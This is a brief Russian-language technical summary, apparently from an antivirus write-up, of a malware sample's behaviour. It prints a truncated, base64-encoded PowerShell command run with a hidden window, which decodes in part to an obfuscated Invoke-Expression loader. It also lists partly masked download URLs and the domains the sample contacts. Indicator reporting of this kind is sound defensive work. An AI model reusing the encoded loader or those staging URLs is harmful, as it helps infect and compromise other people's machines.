Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAFYARQBSAEIATwBTAGUAUABSAEUARgBlAHIAZQBuAGMAZQAuAFQATwBTAFQAUgBpAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAE8AaQBOACcAJwApACAAKABOAGUAdwAtAE8AQgBqAGUAQwB0ACAAIABJAG8ALgBTAHQAcgBFAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\948938.cvr
- 'in###tips.com':443
- 'al###aemlak.com':80
- 'hi#####sewriters.com':80
- 'ja#####eneration.com':80
- http://al###aemlak.com/wp-contents/Mb5/
- http://hi#####sewriters.com/images/OgP/
- http://ja#####eneration.com/Gambia/lSF/
- 'in###tips.com':443
- DNS ASK in###tips.com
- DNS ASK al###aemlak.com
- DNS ASK hi#####sewriters.com
- DNS ASK ge#####achillers.com
- DNS ASK ja#####eneration.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAFYARQBSAEIATwBTAGUAUABSAEUARgBlAHIAZQBuAGMAZQAuAFQATwBTAFQAUgBpAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAE8AaQBOACcAJwApACAAKABOAGUAdwAtAE8AQgBqAGUAQwB0ACAAIABJAG8ALgBTAHQAcgBFAG...' (со скрытым окном)